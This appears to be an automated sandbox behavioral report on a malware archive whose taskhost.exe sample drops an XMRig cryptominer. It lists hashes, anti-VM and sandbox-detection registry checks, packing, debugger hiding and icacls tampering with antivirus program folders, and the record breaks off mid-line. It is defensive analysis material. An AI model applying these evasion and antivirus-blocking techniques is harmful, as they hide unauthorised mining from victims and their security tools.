Overview
overview
10Static
static
10sss/Install/Del3.bat
windows7-x64
1sss/Install/Del3.bat
windows10-2004-x64
1sss/Instal...te.bat
windows7-x64
1sss/Instal...te.bat
windows10-2004-x64
1sss/Install/del.bat
windows7-x64
1sss/Install/del.bat
windows10-2004-x64
1sss/Install/smss.exe
windows7-x64
10sss/Install/smss.exe
windows10-2004-x64
10sss/RDPWinst.exe
windows7-x64
1sss/RDPWinst.exe
windows10-2004-x64
1sss/ReaIte...st.exe
windows7-x64
10sss/ReaIte...st.exe
windows10-2004-x64
10sss/ReaIte...tw.exe
windows7-x64
9sss/ReaIte...tw.exe
windows10-2004-x64
9sss/Window...rv.exe
windows7-x64
10sss/Window...rv.exe
windows10-2004-x64
10sss/Window...MD.exe
windows7-x64
1sss/Window...MD.exe
windows10-2004-x64
1sss/Window...le.exe
windows7-x64
1sss/Window...le.exe
windows10-2004-x64
1sss/Window...st.exe
windows7-x64
1sss/Window...st.exe
windows10-2004-x64
1sss/Window...64.sys
windows7-x64
1sss/Window...64.sys
windows10-2004-x64
1sss/Window...dg.exe
windows7-x64
9sss/Window...dg.exe
windows10-2004-x64
9sss/Window...on.bat
windows7-x64
1sss/Window...on.bat
windows10-2004-x64
1Analysis
-
max time kernel
1050s -
max time network
1054s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2024 23:04
Behavioral task
behavioral1
Sample
sss/Install/Del3.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
sss/Install/Del3.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
sss/Install/Delete.bat
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
sss/Install/Delete.bat
Resource
win10v2004-20240319-en
Behavioral task
behavioral5
Sample
sss/Install/del.bat
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
sss/Install/del.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
sss/Install/smss.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
sss/Install/smss.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
sss/RDPWinst.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
sss/RDPWinst.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
sss/ReaItekHD/taskhost.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
sss/ReaItekHD/taskhost.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
sss/ReaItekHD/taskhostw.exe
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
sss/ReaItekHD/taskhostw.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
sss/Windows Tasks Service/winserv.exe
Resource
win7-20240215-en
Behavioral task
behavioral16
Sample
sss/Windows Tasks Service/winserv.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
sss/WindowsTask/AMD.exe
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
sss/WindowsTask/AMD.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
sss/WindowsTask/AppModule.exe
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
sss/WindowsTask/AppModule.exe
Resource
win10v2004-20240319-en
Behavioral task
behavioral21
Sample
sss/WindowsTask/MicrosoftHost.exe
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
sss/WindowsTask/MicrosoftHost.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
sss/WindowsTask/WinRing0x64.sys
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
sss/WindowsTask/WinRing0x64.sys
Resource
win10v2004-20240226-en
Behavioral task
behavioral25
Sample
sss/WindowsTask/audiodg.exe
Resource
win7-20231129-en
Behavioral task
behavioral26
Sample
sss/WindowsTask/audiodg.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
sss/WindowsTask/winlogon.bat
Resource
win7-20240221-en
Behavioral task
behavioral28
Sample
sss/WindowsTask/winlogon.bat
Resource
win10v2004-20240226-en
General
-
Target
sss/ReaItekHD/taskhost.exe
-
Size
21.7MB
-
MD5
b2ceb39a1dc0ed07e6e91ebc1131e6af
-
SHA1
bd5d9ca87727af82c0109d8fdd44fcd090a4302a
-
SHA256
7f29a1005a7c5c936791c1f9b2a6745286a01467fb15c94beaaf72ac959aee1e
-
SHA512
c8deb6c184e58fb27f2d760c8740af5a62c4182824e9b48607eb810fa95896c8bcdbf8d50c117f06a620b8f35c3eaa59a9376f8b8b9d27ca17a2b2f2047adb07
-
SSDEEP
393216:h/f16H6QzwnoD13bPmzcAWOzOutBzA6YG7E3VHEx8OdM8E4BQ4vqd0TEX:hV4SoD13bPmzcAWUA6rE3VHEx86MgKYQ
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
taskhost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhost.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\WindowsTask\MicrosoftHost.exe family_xmrig C:\ProgramData\WindowsTask\MicrosoftHost.exe xmrig -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
taskhost.exeaudiodg.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ audiodg.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
taskhost.exeaudiodg.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion audiodg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion audiodg.exe -
Executes dropped EXE 3 IoCs
Processes:
Packs.exeaudiodg.exeMicrosoftHost.exepid process 1276 Packs.exe 1884 audiodg.exe 1432 MicrosoftHost.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 4520 icacls.exe 2760 icacls.exe 1588 icacls.exe 2308 icacls.exe 2864 icacls.exe 5064 icacls.exe 4768 icacls.exe 2208 icacls.exe 4952 icacls.exe 528 icacls.exe 4296 icacls.exe 2720 icacls.exe 1420 icacls.exe 3792 icacls.exe 3960 icacls.exe 3500 icacls.exe 4592 icacls.exe 1132 icacls.exe 692 icacls.exe 4792 icacls.exe 384 icacls.exe 4320 icacls.exe 3760 icacls.exe 2760 icacls.exe 208 icacls.exe 2348 icacls.exe 2924 icacls.exe 4704 icacls.exe 4296 icacls.exe 1140 icacls.exe 3304 icacls.exe 5056 icacls.exe 988 icacls.exe 3816 icacls.exe 3476 icacls.exe 3488 icacls.exe 1508 icacls.exe 2660 icacls.exe 3960 icacls.exe 2608 icacls.exe 2672 icacls.exe 3812 icacls.exe 3816 icacls.exe 4412 icacls.exe 3720 icacls.exe 2632 icacls.exe 692 icacls.exe 2856 icacls.exe 3548 icacls.exe 1216 icacls.exe 2012 icacls.exe 1808 icacls.exe 4068 icacls.exe 1712 icacls.exe 4980 icacls.exe 4384 icacls.exe 3696 icacls.exe 4980 icacls.exe 3300 icacls.exe 1708 icacls.exe 3640 icacls.exe 1512 icacls.exe 3168 icacls.exe 2088 icacls.exe -
Processes:
resource yara_rule behavioral12/memory/4708-0-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-2-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-3-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-4-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-5-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-6-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-7-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-8-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-9-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-10-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida C:\ProgramData\WindowsTask\audiodg.exe themida behavioral12/memory/4708-33-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-34-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-36-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-37-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-38-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-39-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-40-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-48-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-50-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-51-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-52-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-54-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-55-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-56-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-58-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-59-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-63-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-64-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-65-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-71-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-72-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-73-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-74-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-75-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-76-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-81-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-82-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-83-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-84-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-85-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-86-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-87-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-88-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-89-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-90-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-91-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-92-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-93-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-94-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-95-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-96-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-98-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-97-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-99-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-100-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-102-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-101-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-103-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-104-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-105-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-106-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-107-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-108-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida -
Processes:
taskhost.exeaudiodg.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA audiodg.exe -
AutoIT Executable 63 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral12/memory/4708-3-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-4-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-5-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-6-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-7-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-8-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-9-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-10-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-33-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-34-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-36-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-37-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-38-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-39-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-40-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-51-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-52-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-54-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-55-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-56-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-58-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-59-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-63-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-64-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-65-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-71-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-72-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-73-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-74-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-75-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-76-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-81-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-82-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-83-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-84-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-85-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-86-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-87-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-88-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-89-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-90-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-91-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-92-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-93-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-94-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-95-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-96-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-98-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-97-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-99-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-100-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-102-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-101-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-103-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-104-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-105-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-106-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-107-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-108-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-109-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-110-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-111-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-112-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
taskhost.exeaudiodg.exepid process 4708 taskhost.exe 1884 audiodg.exe -
Drops file in Program Files directory 38 IoCs
Processes:
taskhost.exedescription ioc process File opened for modification C:\Program Files\DrWeb taskhost.exe File opened for modification C:\Program Files\Common Files\McAfee taskhost.exe File opened for modification C:\Program Files\Loaris Trojan Remover taskhost.exe File opened for modification C:\Program Files (x86)\Transmission taskhost.exe File opened for modification C:\Program Files\Transmission taskhost.exe File opened for modification C:\Program Files\HitmanPro taskhost.exe File opened for modification C:\Program Files\Cezurity taskhost.exe File opened for modification C:\Program Files\Ravantivirus taskhost.exe File opened for modification C:\Program Files (x86)\Panda Security taskhost.exe File opened for modification C:\Program Files\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files\Bitdefender Agent taskhost.exe File opened for modification C:\Program Files\Process Lasso taskhost.exe File opened for modification C:\Program Files\Common Files\Doctor Web taskhost.exe File opened for modification C:\Program Files (x86)\Cezurity taskhost.exe File opened for modification C:\Program Files\EnigmaSoft taskhost.exe File opened for modification C:\Program Files\SUPERAntiSpyware taskhost.exe File opened for modification C:\Program Files\AVAST Software taskhost.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus taskhost.exe File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter taskhost.exe File opened for modification C:\Program Files (x86)\360 taskhost.exe File opened for modification C:\Program Files (x86)\AVAST Software taskhost.exe File opened for modification C:\Program Files\AVG taskhost.exe File opened for modification C:\Program Files (x86)\AVG taskhost.exe File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare taskhost.exe File opened for modification C:\Program Files\Process Hacker 2 taskhost.exe File opened for modification C:\Program Files (x86)\SpeedFan taskhost.exe File opened for modification C:\Program Files\Rainmeter taskhost.exe File opened for modification C:\Program Files (x86)\IObit taskhost.exe File opened for modification C:\Program Files\RogueKiller taskhost.exe File opened for modification C:\Program Files (x86)\SpyHunter taskhost.exe File opened for modification C:\Program Files\Malwarebytes taskhost.exe File opened for modification C:\Program Files\COMODO taskhost.exe File opened for modification C:\Program Files\Enigma Software Group taskhost.exe File opened for modification C:\Program Files\SpyHunter taskhost.exe File opened for modification C:\Program Files\Common Files\AV taskhost.exe File opened for modification C:\Program Files\ESET taskhost.exe File opened for modification C:\Program Files (x86)\Moo0 taskhost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
audiodg.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 audiodg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString audiodg.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 2316 ipconfig.exe -
NTFS ADS 1 IoCs
Processes:
taskhost.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\winmgmts:\localhost\root\CIMV2 taskhost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskhost.exepid process 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskhost.exepid process 4708 taskhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
MicrosoftHost.exedescription pid process Token: SeLockMemoryPrivilege 1432 MicrosoftHost.exe Token: SeLockMemoryPrivilege 1432 MicrosoftHost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
MicrosoftHost.exepid process 1432 MicrosoftHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
taskhost.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4708 wrote to memory of 2844 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 2844 4708 taskhost.exe cmd.exe PID 2844 wrote to memory of 2316 2844 cmd.exe Conhost.exe PID 2844 wrote to memory of 2316 2844 cmd.exe Conhost.exe PID 4708 wrote to memory of 3320 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 3320 4708 taskhost.exe cmd.exe PID 3320 wrote to memory of 4424 3320 cmd.exe gpupdate.exe PID 3320 wrote to memory of 4424 3320 cmd.exe gpupdate.exe PID 4708 wrote to memory of 1276 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1276 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1276 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1640 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1640 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 752 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 752 4708 taskhost.exe cmd.exe PID 752 wrote to memory of 1712 752 cmd.exe Conhost.exe PID 752 wrote to memory of 1712 752 cmd.exe Conhost.exe PID 4708 wrote to memory of 1136 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1136 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 2764 4708 taskhost.exe Conhost.exe PID 4708 wrote to memory of 2764 4708 taskhost.exe Conhost.exe PID 2764 wrote to memory of 3548 2764 cmd.exe icacls.exe PID 2764 wrote to memory of 3548 2764 cmd.exe icacls.exe PID 4708 wrote to memory of 928 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 928 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 2644 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 2644 4708 taskhost.exe cmd.exe PID 2644 wrote to memory of 2348 2644 cmd.exe icacls.exe PID 2644 wrote to memory of 2348 2644 cmd.exe icacls.exe PID 4708 wrote to memory of 3568 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 3568 4708 taskhost.exe cmd.exe PID 3568 wrote to memory of 4520 3568 cmd.exe icacls.exe PID 3568 wrote to memory of 4520 3568 cmd.exe icacls.exe PID 4708 wrote to memory of 1592 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1592 4708 taskhost.exe cmd.exe PID 1592 wrote to memory of 5056 1592 cmd.exe Conhost.exe PID 1592 wrote to memory of 5056 1592 cmd.exe Conhost.exe PID 4708 wrote to memory of 4264 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 4264 4708 taskhost.exe cmd.exe PID 4264 wrote to memory of 3604 4264 cmd.exe icacls.exe PID 4264 wrote to memory of 3604 4264 cmd.exe icacls.exe PID 4708 wrote to memory of 3168 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 3168 4708 taskhost.exe cmd.exe PID 3168 wrote to memory of 3192 3168 cmd.exe icacls.exe PID 3168 wrote to memory of 3192 3168 cmd.exe icacls.exe PID 4708 wrote to memory of 4500 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 4500 4708 taskhost.exe cmd.exe PID 4500 wrote to memory of 3960 4500 cmd.exe icacls.exe PID 4500 wrote to memory of 3960 4500 cmd.exe icacls.exe PID 4708 wrote to memory of 1180 4708 taskhost.exe cmd.exe PID 4708 wrote to memory of 1180 4708 taskhost.exe cmd.exe PID 1180 wrote to memory of 4412 1180 cmd.exe icacls.exe PID 1180 wrote to memory of 4412 1180 cmd.exe icacls.exe PID 4708 wrote to memory of 1040 4708 taskhost.exe Conhost.exe PID 4708 wrote to memory of 1040 4708 taskhost.exe Conhost.exe PID 1040 wrote to memory of 32 1040 cmd.exe icacls.exe PID 1040 wrote to memory of 32 1040 cmd.exe icacls.exe PID 4708 wrote to memory of 2088 4708 taskhost.exe cmd.exe PID 